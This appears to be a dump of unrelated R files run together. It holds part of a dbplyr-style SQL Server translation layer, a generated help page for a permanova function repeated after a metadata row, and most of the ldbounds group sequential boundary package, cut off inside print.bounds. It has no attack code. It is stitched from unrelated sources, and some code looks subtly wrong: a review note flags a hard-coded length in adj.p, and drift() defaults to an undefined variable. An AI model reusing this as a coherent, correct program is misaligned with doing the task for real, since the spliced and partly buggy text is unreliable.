ifelse = function(test, yes, no) mssql_sql_if(test, yes, no),
as.numeric = sql_cast("NUMERIC"),
as.double = sql_cast("NUMERIC"),
as.character = sql_cast("VARCHAR(MAX)"),
log = sql_prefix("LOG"),
nchar = sql_prefix("LEN"),
atan2 = sql_prefix("ATN2"),
ceil = sql_prefix("CEILING"),
ceiling = sql_prefix("CEILING"),
# https://dba.stackexchange.com/questions/187090
pmin = sql_not_supported("pmin()"),
pmax = sql_not_supported("pmax()"),
substr = function(x, start, stop) {
len <- stop - start + 1
sql_expr(SUBSTRING(!!x, !!start, !!len))
},
is.null = function(x) mssql_is_null(x, sql_current_context()),
is.na = function(x) mssql_is_null(x, sql_current_context()),
# TRIM is not supported on MS SQL versions under 2017
# https://docs.microsoft.com/en-us/sql/t-sql/functions/trim-transact-sql
# Best solution is to nest a left and right trims.
trimws = function(x) {
sql_expr(LTRIM(RTRIM(!!x)))
},
# MSSQL supports CONCAT_WS in the CTP version of 2016
paste = sql_not_supported("paste()"),
# stringr functions
str_length = sql_prefix("LEN"),
str_locate = function(string, pattern) {
sql_expr(CHARINDEX(!!pattern, !!string))
},
str_detect = function(string, pattern) {
sql_expr(CHARINDEX(!!pattern, !!string) > 0L)
}
),
sql_translator(.parent = base_odbc_agg,
sd = sql_aggregate("STDEV", "sd"),
var = sql_aggregate("VAR", "var"),
# MSSQL does not have function for: cor and cov
cor = sql_not_supported("cor()"),
cov = sql_not_supported("cov()")
),
sql_translator(.parent = base_odbc_win,
sd = win_aggregate("STDEV"),
var = win_aggregate("VAR"),
# MSSQL does not have function for: cor and cov
cor = win_absent("cor"),
cov = win_absent("cov")
)
)}
#' @export
`db_analyze.Microsoft SQL Server` <- function(con, table, ...) {
# Using UPDATE STATISTICS instead of ANALYZE as recommended in this article
# https://docs.microsoft.com/en-us/sql/t-sql/statements/update-statistics-transact-sql
sql <- build_sql("UPDATE STATISTICS ", as.sql(table), con = con)
DBI::dbExecute(con, sql)
}
mssql_temp_name <- function(name, temporary){
# check that name has prefixed '##' if temporary
if (temporary && substr(name, 1, 1) != "#") {
name <- paste0("##", name)
message("Created a temporary table named: ", name)
}
name
}
#' @export
`db_save_query.Microsoft SQL Server` <- function(con, sql, name,
temporary = TRUE, ...){
name <- mssql_temp_name(name, temporary)
tt_sql <- build_sql(
"SELECT * INTO ", as.sql(name), " FROM (", sql, ") ", as.sql(name),
con = con
)
dbExecute(con, tt_sql)
name
}
#' @export
`db_write_table.Microsoft SQL Server` <- function(con, table, types, values, temporary = TRUE, ...) {
table <- mssql_temp_name(table, temporary)
dbWriteTable(
con,
name = table,
types = types,
value = values,
temporary = FALSE,
row.names = FALSE
)
table
}
# `IS NULL` returns a boolean expression, so you can't use it in a result set
# the approach using casting return a bit, so you can use in a result set, but not in where.
# Microsoft documentation: The result of a comparison operator has the Boolean data type.
# This has three values: TRUE, FALSE, and UNKNOWN. Expressions that return a Boolean data type are
# known as Boolean expressions. Unlike other SQL Server data types, a Boolean data type cannot
# be specified as the data type of a table column or variable, and cannot be returned in a result set.
# https://docs.microsoft.com/en-us/sql/t-sql/language-elements/comparison-operators-transact-sql
mssql_is_null <- function(x, context) {
if (context$clause %in% c("SELECT", "ORDER")) {
sql_expr(convert(BIT, iif(!!x %is% NULL, 1L, 0L)))
} else {
sql_is_null(x)
}
}
mssql_generic_infix <- function(if_select, if_filter) {
force(if_select)
force(if_filter)
function(x, y) {
if (sql_current_select()) {
f <- if_select
} else {
f <- if_filter
}
sql_call2(f, x, y)
}
}
mssql_sql_if <- function(cond, if_true, if_false = NULL) {
old <- set_current_context(list(clause = ""))
on.exit(set_current_context(old), add = TRUE)
cond <- build_sql(cond)
sql_if(cond, if_true, if_false)
}
globalVariables(c("BIT", "%is%", "convert", "iif", "NOT", "SUBSTRING", "LTRIM", "RTRIM", "CHARINDEX"))
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/permanovas.R
\name{permanova_expr}
\alias{permanova_expr}
\title{Permanova}
\usage{
permanova_expr(expr, meta)
}
\arguments{
\item{expr}{Matrix of the expression}
\item{meta}{Data frame with the variables to compare}
}
\value{
An anova.cca object
}
\description{
Permanova
}
| /man/permanova_expr.Rd | permissive | llrs/integration-helper | R | false | true | 354 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/permanovas.R
\name{permanova_expr}
\alias{permanova_expr}
\title{Permanova}
\usage{
permanova_expr(expr, meta)
}
\arguments{
\item{expr}{Matrix of the expression}
\item{meta}{Data frame with the variables to compare}
}
\value{
An anova.cca object
}
\description{
Permanova
}
|
## Program Name: ldbounds.R##
## Package ldbounds.R (unreleased version) ##
"bounds" <-
function(x,t2=x,iuse=1,asf=NULL,alpha=0.05,phi=rep(1,length(alpha)),sides=2,ztrun=rep(8,length(alpha))){
if (!is.numeric(x)){
stop("'x' must be a vector of analysis times or the number of analysis times")
}
if (length(x)==1){
t <- (1:x)/x
if (t2==x){
t2 <- t
}
}
else{
t <- x
}
if (length(t) != length(t2)){
stop("Original and second time scales must be vectors of the same length.")
}
if ({min(t) < 0.0000001}|{max(t) > 1.0000001}|{min(t2) < 0.0000001}){
stop("Analysis times must be in (0,1]. Second time scale values must be positive.")
}
t3 <- t2
t2 <- t2/max(t2)
if ({sum({t-c(0,t[-length(t)]) < 0.0000001}) > 0}|{sum({t2-c(0,t2[-length(t)]) < 0.0000001}) > 0}){
stop("Analysis times must be ordered from smallest to largest.")
}
if ({sum(alpha < 0.0000001) > 0}|{sum(alpha) > 1.0000001}){
stop("Each component of alpha must be positive and their sum cannot exceed 1.")
}
if (length(iuse) != length(alpha)&(length(iuse) != length(asf))){
stop("For two-sided bounds, the lengths of the iuse and alpha vectors must both be 2.")
}
if (length(asf)==2){
if ({class(asf[[1]])!="function"}|{class(asf[[2]])!="function"}){
stop("Alpha spending function must be of class 'function'.")
}
alpha[1] <- asf[[1]](1)
alpha[2] <- asf[[2]](1)
}
if (length(asf)==1){
if (class(asf)!="function"){
stop("Alpha spending function must be of class 'function'.")
}
alpha <- asf(1)
}
if (sum(iuse==5)<length(asf)){
stop("Can't specify 2 spending functions unless iuse=c(5,5).")
}
if ({sum(iuse==5)>0}&{length(asf)==0}){
stop("If iuse=5, must specify spending function.")
}
if (sum({iuse==3}|{iuse==4}) > length(phi)){
stop("Phi must be specified for each boundary that uses spending function 3 or 4.")
}
if (sum({iuse==3}&{phi <= 0}) > 0){
stop("For power family (iuse=3), phi must be positive.")
}
if (sum({iuse==4}&{phi==0}) > 0){
stop("For Hwang-Shih-DeCani family (iuse=4), phi cannot be 0.")
}
if (length(phi)==1) phi <- rep(phi,2)
if (!sides%in%c(1,2)){
stop("Sides must be 1 or 2.")
}
if ({length(alpha)==1}|{{length(alpha)==2}&{alpha[1]==alpha[2]}&{iuse[1]==iuse[2]}&{length(asf)!=2}&{ztrun[1]==ztrun[2]}&{{length(phi)==1}|{phi[1]==phi[2]}}}){
if ({length(alpha)==1}&{sides==1}){
type <- 1
alph <- alpha
}
if ({length(alpha)==1}&{sides==2}){
type <- 2
alph <- alpha
}
if (length(alpha)==2){
type <- 2
alph <- 2*alpha[1]
}
ld <- landem(t,t2,sides,iuse[1],asf,alph,phi[1],ztrun[1])
ubnd <- ld$upper.bounds
lbnd <- ld$lower.bounds
epr <- ld$exit.pr
dpr <- ld$diff.pr
spend <- ld$spend
}
else{
type <- 3
ld1 <- landem(t,t2,1,iuse[1],asf[[1]],alpha[1],phi[1],ztrun[1])
ld2 <- landem(t,t2,1,iuse[2],asf[[2]],alpha[2],phi[2],ztrun[2])
lbnd <- -ld1$upper.bounds
ubnd <- ld2$upper.bounds
epr <- ld1$exit.pr+ld2$exit.pr
dpr <- ld1$diff.pr+ld2$diff.pr
spend <- c(ld1$spend,ld2$spend)
}
nom.alpha <- 1-pnorm(ubnd)+pnorm(lbnd)
ans <- list(bounds.type=type,spending.type=spend,time=t,time2=t3,alpha=alpha,overall.alpha=sum(alpha),lower.bounds=lbnd,upper.bounds=ubnd,exit.pr=epr,diff.pr=dpr,nom.alpha=nom.alpha)
class(ans) <- "bounds"
return(ans)
}
# Type I error spending: cumulative (pe) and incremental (pd) alpha spent at
# the information times in `t`.
#
# iuse selects the spending family:
#   1 = O'Brien-Fleming-like, 2 = Pocock-like, 3 = power family alpha*t^phi,
#   4 = Hwang-Shih-DeCani (parameter phi), 5 = user-supplied function `asf`
#   (must be increasing with asf(1) <= 1).
# `side` is 1 or 2: each formula spends alpha/side and the result is rescaled
# by `side` at the end.  Returns list(pe, pd, spend) where `spend` labels the
# family used.  Increments below tol are zeroed with a warning.
"alphas" <-
function(iuse,asf,alpha,phi,side,t){
  tol <- 10^(-13)
  if (iuse==1){
    pe <- 2*(1-pnorm(qnorm(1-(alpha/side)/2)/sqrt(t)))
    spend <- "O'Brien-Fleming"
  }
  else if (iuse==2){
    pe <- (alpha/side)*log(1+(exp(1)-1)*t)
    spend <- "Pocock"
  }
  else if (iuse==3){
    pe <- (alpha/side)*t^phi
    spend <- "Power Family: alpha * t^phi"
  }
  else if (iuse==4){
    pe <- (alpha/side)*(1-exp(-phi*t))/(1-exp(-phi)) ### TDC - inserted "-"
    spend <- "Hwang-Shih-DeCani Family"
  }
  else if (iuse==5){
    if(missing(alpha)) alpha <- asf(1)
    if(any(diff(asf(t))<=0.0000001))
      stop("Alpha Spending function must be an increasing function.")
    if(asf(1)>1 ) stop("Alpha Spending function must be less than or equal to 1.")
    spend <- "User-specified spending function"
    pe <- (1/side)*asf(t)
  }
  else stop("Must choose 1, 2, 3, 4, or 5 as spending function.")
  pe <- side*pe
  # Per-look increments of the cumulative spend.
  pd <- pe-c(0,pe[-length(pe)])
  if (sum(as.integer({pd<0.0000001*(-1)}|{pd>1.0000001})) >= 1){
    warning("Spending function error")
    # Clamp elementwise into [0, 1].  The previous min()/max() calls
    # collapsed the whole pd vector to a single scalar.
    pd <- pmin(1,pd)
    pd <- pmax(0,pd)
  }
  for (j in seq_along(pd)){
    if (pd[j] < tol){
      warning("Type I error spent too small for analysis #",j,"\n",
              "Zero used as approximation for ",pd[j])
      pd[j] <- 0
    }
  }
  ans <- list(pe=pe,pd=pd,spend=spend)
  return(ans)
}
"drift" <-
function(t,za=NULL,zb=NULL,t2=x,pow=NULL,drft=NULL,conf=NULL,pval=NULL,pvaltime=NULL,zval=zb[length(zb)]){
if (inherits(t, "bounds")){
za <- t$lower.bounds
zb <- t$upper.bounds
t2 <- t$time2
t <- t$time
}
else {
if(length(t)==1){
if(abs(t - round(t)) < .0000001 & t > 1) t <- 1:t/t
else if(t>1) stop("t must be an integer or in (0,1]")}
if(missing(t2)) t2 <- t
else if (length(t) != length(t2)){
stop("Original and second time scales must be vectors of the same length.")
}
if ({min(t) < 0.0000001}|{max(t) > 1.0000001}|{min(t2) < 0.0000001}){
stop("Analysis times must be in (0,1]. Second time scale values must be positive.")
}
if ({min(t) <= 0}|{max(t) > 1}|{min(t2) <= 0}){
stop("Analysis times must be in (0,1]. Second time scale values must be positive.")
}}
if (sum({t-c(0,t[-length(t)]) <= 0}|{t2-c(0,t[-length(t2)]) <= 0}) > 0){
stop("Analysis times must be ordered from smallest to largest.")
}
if ({is.null(za)}&{!is.null(zb)})
za <- -zb
t3 <- t2
t2 <- t2/max(t2)
if (!is.null(pow)+!is.null(drft)+!is.null(conf)+!is.null(pval)!=1){
stop("Only one of power, drift, confidence level, or p-value ordering can be given.")
}
else if (is.null(pow)&is.null(drft)&is.null(conf)&is.null(pval)){
drft=0
}
drift1 <- NULL
if (!is.null(pow)){
if ({pow <= 0}|{pow > 1}){
stop("Power must be in (0,1].")
}
type <- 1
drift1 <- adrift(t2,za,zb,pow)
}
if (!is.null(drft)){
type <- 2
drift1 <- drft
}
if (!is.null(drift1)){
gl <- glan(t2,za,zb,drift1)
if (!is.null(drft)) pow <- gl$pr
ans <- list(type=type,time=t,time2=t3,lower.bounds=za,upper.bounds=zb,power=pow,
drift=drift1,lower.probs=gl$qneg,upper.probs=gl$qpos,
exit.probs=gl$qneg+gl$qpos,cum.exit=cumsum(gl$qneg+gl$qpos))
}
if (!is.null(conf)){
if (zval < 0){
stop("Confidence interval is only for nonnegative final Z value.")
}
conf.limit <- ci(conf,zval,t2,za,zb)
ans <- list(type=3,time=t,time2=t3,lower.bounds=za,upper.bounds=zb,
conf.level=conf,final.zvalue=zval,conf.interval=conf.limit)
}
if (!is.null(pval)){
if (zval < 0){
stop("P-value is only for nonnegative Z value.")
}
p.value <- adj.p(pval,pvaltime,zval,t2,zb)
ans <- list(type=4,time=t,time2=t3,lower.bounds=za,upper.bounds=zb,
conf.level=conf,analysis.time=pvaltime,final.zvalue=zval,p.ordering=pval,p.value=p.value)
}
class(ans) <- "drift"
return(ans)
}
# Adjusted p-value for a group sequential design.
#
# pval     "SW" = stagewise ordering, "LR" = likelihood ratio ordering.
# pvaltime 1-based index of the analysis being evaluated.
# zval     observed (nonnegative) Z statistic at that look.
# t        information fractions; up.bound the upper boundary values.
"adj.p" <-
function(pval,pvaltime,zval,t,up.bound){
  if (!pval%in%c("SW","LR")){
    stop("Possible p-value orderings are stagewise (SW) and likelihood ratio (LR).")
  }
  if (is.null(pvaltime)){
    stop("P-value time must correspond to one of the analysis times.")
  }
  if (!is.null(pvaltime)){
    if (pvaltime>length(up.bound)){
      stop("P-value time must correspond to one of the analysis times.")
    }
  }
  if (pval=="SW"){
    # Stagewise: probability of stopping by `pvaltime` with Z >= zval,
    # computed under zero drift.
    # NOTE(review): za=rep(-10,3) hard-codes length 3 while zb has length
    # pvaltime -- looks wrong for pvaltime != 3; confirm against drift().
    p.drift <- drift(zb=c(up.bound[1:(pvaltime-1)],zval),za=rep(-10,3),t=t[1:pvaltime],drft=0)
    p.value <- summary(p.drift)$bounds1[,'Cum exit pr.'][pvaltime]
  }
  else{
    # Likelihood ratio ordering: sum exit probabilities over all looks, with
    # the boundary at each look raised to at least zval.
    lr.exit <- rep(0,length(up.bound))
    maxval1 <- max(up.bound[1],zval)
    lr1 <- drift(zb=maxval1,za=-10,t=t[1],drft=0)
    lr.exit[1] <- lr1$exit[1]
    for (j in 1:(length(up.bound)-1)){
      maxval <- max(up.bound[j+1],zval)
      lr <- drift(zb=c(up.bound[1:j],maxval),za=rep(-10,j+1),t=t[1:(j+1)],drft=0)
      lr.exit[j+1] <- lr$exit[j+1]
    }
    p.value <- sum(lr.exit)
  }
  return(p.value)
}
# Drift value that achieves power `pow` for the design with bounds (za, zb)
# at information times t.  The closed-form fixed-sample drift at the final
# look seeds the bisection search over the full sequential design.
"adrift" <-
function(t,za,zb,pow){
  k <- length(t)
  start <- (zb[k] + qnorm(pow)) / sqrt(t[k])
  bisect(t, za, zb, pow, start)
}
# Find the drift whose boundary-crossing probability equals `target`.
#
# An expanding fixed-step search (step dl) first brackets the root, then the
# loop switches to midpoint halving.  When upper=TRUE the matched quantity is
# the upper-boundary exit probability sum(glan()$qpos); otherwise it is the
# overall crossing probability glan()$pr.  `drft` is the starting guess.
"bisect" <-
function(t,za,zb,target,drft=0,upper=FALSE){
  tol <- 0.000001
  dl <- 0.25
  # Flags: have we seen values above (gothi) and below (gotlo) the target?
  gotlo <- 0
  gothi <- 0
  prev <- 0
  pr <- 0
  # Iterate until the probability matches, or successive iterates stall.
  while ({abs(pr-target) > tol}&{abs(drft-prev) > tol/10}){
    glan.out <- glan(t,za,zb,drft)
    if (upper){
      pr <- sum(glan.out$qpos)
    }
    if (!upper){
      pr <- glan.out$pr
    }
    if (pr > target+tol){
      hi <- drft
      drft <- drft-dl
      gothi <- 1
    }
    if (pr < target-tol){
      lo <- drft
      drft <- drft+dl
      gotlo <- 1
    }
    if ({gothi==1}&{gotlo==1}){
      # Root is bracketed in [lo, hi]: refine by bisection.
      prev <- drft
      drft <- (lo+hi)/2
    }
  }
  if ({abs(drft-prev) <= tol/10}&{abs(pr-target) > tol}){
    warning("Convergence problem")
  }
  return(drft)
}
# Search for the upper boundary value at look i whose exit probability
# matches the target spend `pd`.  Starting from the previous bound yb[i-1],
# the step size shrinks by a factor of 10 each sweep, moving up or down as
# needed.  qp() (defined elsewhere in the package) evaluates the crossing
# probability for a candidate boundary.
"bsearch" <-
function(last,nints,i,pd,stdv,ya,yb){
  tol <- 10^(-7)
  del <- 10
  uppr <- yb[i-1]
  q <- qp(uppr,last,nints[i-1],ya[i-1],yb[i-1],stdv)
  while (abs(q-pd) > tol){
    # Shrink the step and pick a direction: +1 raises the bound (lowers q).
    del <- del/10
    incr <- 2*as.integer(q > pd+tol)-1
    j <- 1
    while (j <= 50){
      uppr <- uppr+incr*del
      q <- qp(uppr,last,nints[i-1],ya[i-1],yb[i-1],stdv)
      if ({abs(q-pd) > tol}&{j==50}){
        stop("Error in search: not converging")
      }
      else if ({{incr==1}&{q <= pd+tol}}|{{incr==-1}&{q >= pd-tol}}){
        # Crossed the target: end this sweep so the step shrinks again.
        j <- 50
      }
      j <- j+1
    }
  }
  ybval <- uppr
  return(ybval)
}
# Confidence interval for the drift parameter after a group sequential test.
#
# conf  confidence level (e.g. 0.95); value  observed final Z statistic.
# The final upper bound is replaced by the observed Z, a Wald-style interval
# seeds the search, and bisect() inverts the upper-crossing probability at
# (1-conf)/2 and 1-(1-conf)/2 to obtain the exact limits.
"ci" <-
function(conf,value,t,za,zb){
  zb[length(t)] <- value
  zcrit <- qnorm(1-(1-conf)/2)
  limit <- (value+c(-1,1)*zcrit)/sqrt(t[length(t)])
  target <- c(0,1)*conf+(1-conf)/2
  lim1 <- bisect(t,za,zb,target[1],limit[1],upper=TRUE)
  lim2 <- bisect(t,za,zb,target[2],limit[2],upper=TRUE)
  lim <- list(lower.limit=lim1,upper.limit=lim2)
  return(lim)
}
"commonbounds" <-
function(looks,t=(1:looks)/looks,t2=t,iuse="OF",alpha=0.05,sides=2){
if ({!is.null(looks)}&{!is.numeric(looks)}){
stop("'looks' must be an integer.")
}
if (sum(t==(1:length(t))/length(t))<length(t)){
warning("Time points are not equally spaced.")
}
if (length(t) != length(t2)){
stop("Original and second time scales must be vectors of the same length.")
}
if ({min(t) < 0.0000001}|{max(t) > 1.0000001}|{min(t2) < 0.0000001}){
stop("Analysis times must be in (0,1]. Second time scale values must be positive.")
}
t3 <- t2
t2 <- t2/max(t2)
if ({sum({t-c(0,t[-length(t)]) < 0.0000001}) > 0}|{sum({t2-c(0,t2[-length(t)]) < 0.0000001}) > 0}){
stop("Analysis times must be ordered from smallest to largest.")
}
if (sum(!iuse%in%c("PK","OF","HP"))>0){
stop("Boundary type (iuse) must be \"PK\" or \"OF\".")
}
if ({sum(alpha < 0.0000001) > 0}|{sum(alpha) > 1.0000001}){
stop("Each component of alpha must be positive and their sum cannot exceed 1.")
}
if (length(iuse) != length(alpha)){
stop("For two-sided bounds, the lengths of the iuse and alpha vectors must both be 2.")
}
if (!sides%in%c(1,2)){
stop("Sides must be 1 or 2.")
}
if ({length(alpha)==1}|{{length(alpha)==2}&{alpha[1]==alpha[2]}&{iuse[1]==iuse[2]}}){
if ({length(alpha)==1}&{sides==2}){
alph <- alpha/2
}
else{
alph <- alpha
}
if (iuse[1]=="PK"){
root <- uniroot(search.glan.pocock,c(1.5,2.3+0.05*looks),k=looks,alpha=alph)$root
ubnd <- rep(root,looks)
spend <- "Pocock"
}
if (iuse[1]=="OF"){
root <- uniroot(search.glan.obrien,c(1.5,2+0.05*looks),k=looks,alpha=alph)$root
ubnd <- root/sqrt((1:looks)/looks)
spend <- "O'Brien-Fleming"
}
if ({length(alpha)==1}&{sides==1}){
type <- 4
lbnd <- rep(-8,length(ubnd))
}
if ({length(alpha)==2}|{{length(alpha)==1}&{sides==2}}){
type <- 5
lbnd <- -1*ubnd
}
drift.for.probs <- drift(za=lbnd,zb=ubnd,t=t2,drft=0)
dpr <- drift.for.probs$upper.probs
epr <- cumsum(dpr)
}
else{
type <- 6
spend <- c("","")
if (iuse[1]=="PK"){
root <- uniroot(search.glan.pocock,c(1.5,2.3+0.05*looks),k=looks,alpha=alpha[1])$root
lbnd <- -1*rep(root,looks)
spend[1] <- "Pocock"
}
if (iuse[1]=="OF"){
root <- uniroot(search.glan.obrien,c(1.5,2+0.05*looks),k=looks,alpha=alpha[1])$root
lbnd <- -1*root/sqrt((1:looks)/looks)
spend[1] <- "O'Brien-Fleming"
}
if (iuse[2]=="PK"){
root <- uniroot(search.glan.pocock,c(1.5,2.3+0.05*looks),k=looks,alpha=alpha[2])$root
ubnd <- rep(root,looks)
spend[2] <- "Pocock"
}
if (iuse[2]=="OF"){
root <- uniroot(search.glan.obrien,c(1.5,2+0.05*looks),k=looks,alpha=alpha[2])$root
ubnd <- root/sqrt((1:looks)/looks)
spend[2] <- "O'Brien-Fleming"
}
drift.for.probs <- drift(za=lbnd,zb=ubnd,t=t2,drft=0)
dpr <- drift.for.probs$upper.probs+drift.for.probs$lower.probs
epr <- cumsum(dpr)
}
nom.alpha <- 1-pnorm(ubnd)+pnorm(lbnd)
ans <- list(bounds.type=type,spending.type=spend,time=t,time2=t3,alpha=alpha,overall.alpha=sum(alpha),lower.bounds=lbnd,upper.bounds=ubnd,exit.pr=epr,diff.pr=dpr,nom.alpha=nom.alpha)
class(ans) <- "bounds"
return(ans)
}
"cprob" <-
function(last,nints,ya,yb,i,stdv){
hlast <- (yb[i-1]-ya[i-1])/nints[i-1]
grid <- seq(ya[i-1],yb[i-1],length=nints[i-1]+1)
pupr <- (1-pnorm(yb[i],mean=grid,sd=stdv))*last
plow <- pnorm(ya[i],mean=grid,sd=stdv)*last
tqpos <- 0.5*hlast*(2*sum(pupr)-pupr[1]-pupr[length(pupr)]) # This is "trap"
tqneg <- 0.5*hlast*(2*sum(plow)-plow[1]-plow[length(plow)]) # This is "trap"
ans <- list(qpos=tqpos,qneg=tqneg)
return(ans)
}
"fcab" <-
function(last,nints,yam1,h,x,stdv){
f <- last*dnorm(h*c(0:nints)+yam1,mean=matrix(rep(x,nints+1),nints+1,length(x),byrow=TRUE),sd=stdv)
area <- 0.5*h*(2*colSums(f)-f[1,]-f[nrow(f),]) # This is "trap"
return(area)
}
"glan" <-
function(t,za,zb,drft){
h <- 0.05
stdv <- sqrt(t-c(0,t[-length(t)])) # These are subroutine "sd"
sdproc <- sqrt(t) # These are subroutine "sd"
yb <- zb*sdproc-drft*t
ya <- za*sdproc-drft*t
nints <- ceiling((yb-ya)/(h*stdv))
qneg1 <- pnorm(za[1],mean=drft*t[1]/stdv[1])
qpos1 <- 1-pnorm(zb[1],mean=drft*t[1]/stdv[1])
cp <- matrix(0,length(t),2)
cp[1,] <- c(qpos1,qneg1)
if (length(t) >= 2){
grid <- seq(ya[1],yb[1],length=nints[1]+1) # These are "first"
last <- dnorm(grid,mean=0,sd=stdv[1]) # These are "first"
for (i in 2:length(t)){
cpr <- cprob(last,nints,ya,yb,i,stdv[i])
cp[i,] <- c(cpr[[1]],cpr[[2]])
if (i < length(t)){
hlast <- (yb[i-1]-ya[i-1])/nints[i-1] # These are "other"
x <- seq(ya[i],yb[i],length=nints[i]+1) # These are "other"
last <- fcab(last,nints[i-1],ya[i-1],hlast,x,stdv[i]) # These are "other"
}
}
}
pr <- sum(cp)
ans <- list(pr=pr,qpos=cp[,1],qneg=cp[,2])
return(ans)
}
"landem" <-
function(t,t2,side,iuse,asf,alpha,phi,ztrun){
h <- 0.05
zninf <- -8
tol <- 0.0000001
stdv <- sqrt(t2-c(0,t2[-length(t2)])) # These are subroutine "sd"
sdproc <- sqrt(t2) # These are subroutine "sd"
alph <- alphas(iuse,asf,alpha,phi,side,t)
za <- zb <- ya <- yb <- nints <- rep(0,length(t))
pd <- alph$pd
pe <- alph$pe
if (pd[1]==0){
zb[1] <- -zninf
if (zb[1] > ztrun){
zb[1] <- ztrun
pd[1] <- side*(1-pnorm(zb[1]))
pe[1] <- pd[1]
if (length(t) > 1) pd[2] <- pe[2]-pe[1]
}
yb[1] <- zb[1]*stdv[1]
}
else if (pd[1] < 1){
zb[1] <- qnorm(1-pd[1]/side)
if (zb[1] > ztrun){
zb[1] <- ztrun
pd[1] <- side*(1-pnorm(zb[1]))
pe[1] <- pd[1]
if (length(t) > 1) pd[2] <- pe[2]-pe[1]
}
yb[1] <- zb[1]*stdv[1]
}
if (side==1){
za[1] <- zninf
ya[1] <- za[1]*stdv[1]
}
else if (side != 1){
za[1] <- -zb[1]
ya[1] <- -yb[1]
}
nints[1] <- ceiling((yb[1]-ya[1])/(h*stdv[1]))
if (length(t) >= 2){
grid <- seq(ya[1],yb[1],length=nints[1]+1) # These are "first"
last <- dnorm(grid,mean=0,sd=stdv[1]) # These are "first"
for (i in 2:length(t)){
if ({pd[i] < 0}|{pd[i] > 1}){
warning("Possible error in spending function. May be due to truncation.")
pd[i] <- min(1,pd[i])
pd[i] <- max(0,pd[i])
}
if (pd[i] < tol){
zb[i] <- -zninf
if (zb[i] > ztrun){
zb[i] <- ztrun
pd[i] <- side*qp(zb[i]*sdproc[i],last,nints[i-1],ya[i-1],yb[i-1],stdv[i])
pe[i] <- pd[i]+pe[i-1]
if (i < length(t)) pd[i+1] <- pe[i+1]-pe[i]
}
yb[i] <- zb[i]*sdproc[i]
}
else if (pd[i]==1) zb[i] <- yb[i] <- 0
else if ({pd[i] >= tol}&{pd[i] < 1}){
yb[i] <- bsearch(last,nints,i,pd[i]/side,stdv[i],ya,yb)
zb[i] <- yb[i]/sdproc[i]
if (zb[i] > ztrun){
zb[i] <- ztrun
pd[i] <- side*qp(zb[i]*sdproc[i],last,nints[i-1],ya[i-1],yb[i-1],stdv[i])
pe[i] <- pd[i]+pe[i-1]
if (i < length(t)){
pd[i+1] <- pe[i+1]-pe[i]
}
}
yb[i] <- zb[i]*sdproc[i]
}
if (side==1){
ya[i] <- zninf*sdproc[i]
za[i] <- zninf
}
else if (side==2){
ya[i] <- -yb[i]
za[i] <- -zb[i]
}
nints[i] <- ceiling((yb[i]-ya[i])/(h*stdv[i]))
if (i < length(t)){
hlast <- (yb[i-1]-ya[i-1])/nints[i-1] # These are "other"
x <- seq(ya[i],yb[i],length=nints[i]+1) # These are "other"
last <- fcab(last,nints[i-1],ya[i-1],hlast,x,stdv[i]) # These are "other"
}
}
}
ans <- list(lower.bounds=za,upper.bounds=zb,exit.pr=pe,diff.pr=pd,spend=alph$spend)
return(ans)
}
"plot.bounds" <-
function(x, scale = "z", main = NULL, xlab = NULL, ylab = NULL,
xlim, ylim, las=1, pch=19, type="o",add=F,...){
if (!((inherits(x, "bounds"))|(inherits(x, "drift"))))
stop("'x' must inherit from class \"bounds\" or \"drift\"")
if (!scale%in%c("z","b"))
stop("Scale must be either \"z\" (z-value) or \"b\" (b-value)")
if (is.null(main))
main <- "Sequential boundaries using the Lan-DeMets method"
if (is.null(xlab))
xlab <- "Time"
if (is.null(ylab)){
if (scale=="z"){
ylab <- "Z"
}
else{
ylab <- "B"
}
}
z <- c(0,x$time)
r <- rep(0,length(z))
if(missing(xlim)) xlim <- c(0,z[length(z)])
if ({inherits(x, "bounds")}&{x$bounds.type==1}){
u <- c(NA,x$upper.bounds)
if (scale=="b"){
u <- u*sqrt(z)
}
if(missing(ylim)) ylim <- c(0,max(u,na.rm=T))
if(add) lines(z,u, pch=pch, type=type,...)
else plot(z,u, main = main, xlab = xlab, ylab = ylab, xlim=xlim,
ylim=ylim, las=las, pch=pch, type=type,...)
points(z,r, ...)
lines(z,r,...)
}
else{
u <- c(NA,x$upper.bounds)
l <- c(NA,x$lower.bounds)
if (scale=="b"){
u <- u*sqrt(z)
l <- l*sqrt(z)
}
if(missing(ylim)) ylim <- c(min(l,na.rm=T),max(u,na.rm=T))
if(add) lines(z,u, pch=pch, type=type,...)
else plot(z,u, main = main, xlab = xlab, ylab = ylab, xlim=xlim,
ylim=ylim, las=las, pch=pch, type=type,...)
points(z,l,pch=pch, ...)
lines(z,l,...)
points(z,r, ...)
lines(z,r,...)
}
}
"plot.drift" <-
function(x, scale = "z", main = NULL, xlab = NULL, ylab = NULL,
xlim, ylim, las=1, pch=19, type="o",add=F, ...){
if (!((inherits(x, "bounds"))|(inherits(x, "drift"))))
stop("'x' must inherit from class \"bounds\" or \"drift\"")
if (!scale%in%c("z","b"))
stop("Scale must be either \"z\" (z-value) or \"b\" (b-value)")
if (is.null(main))
main <- "Sequential boundaries using the Lan-DeMets method"
if (is.null(xlab))
xlab <- "Time"
if (is.null(ylab)){
if (scale=="z"){
ylab <- "Z"
}
else{
ylab <- "B"
}
}
z <- c(0,x$time)
r <- rep(0,length(z))
if(missing(xlim)) xlim <- c(0,z[length(z)])
if ({inherits(x, "bounds")}&&{x$bounds.type==1}){ ### TDC added extra "&"
u <- c(NA,x$upper.bounds)
if (scale=="b"){
u <- u*sqrt(z)
}
if(missing(ylim)) ylim <- c(0,max(u,na.rm=T))
if(add) lines(z,u, pch=pch, type=type,...)
else plot(z,u, main = main, xlab = xlab, ylab = ylab, xlim=xlim, ylim=ylim,
las=las, pch=pch, type=type,...)
points(z,r, ...)
lines(z,r,...)
}
else{
u <- c(NA,x$upper.bounds)
l <- c(NA,x$lower.bounds)
if (scale=="b"){
u <- u*sqrt(z)
l <- l*sqrt(z)
}
if(missing(ylim)) ylim <- c(min(l,na.rm=T),max(u,na.rm=T))
if(add) lines(z,u, pch=pch, type=type,...)
else plot(z,u, main = main, xlab = xlab, ylab = ylab, xlim=xlim, ylim=ylim, las=las, pch=pch,
type=type,...)
points(z,l,pch=19, ...)
lines(z,l,...)
points(z,r, ...)
lines(z,r,...)
}
}
"print.bounds" <-
function(object, ...)
{
z <- object
if (!inherits(z, "bounds"))
stop("'object' must inherit from class \"bounds\"")
p <- length(z$time)
if (identical(z$time,z$time2)){
b <- matrix(NA, p, 3)
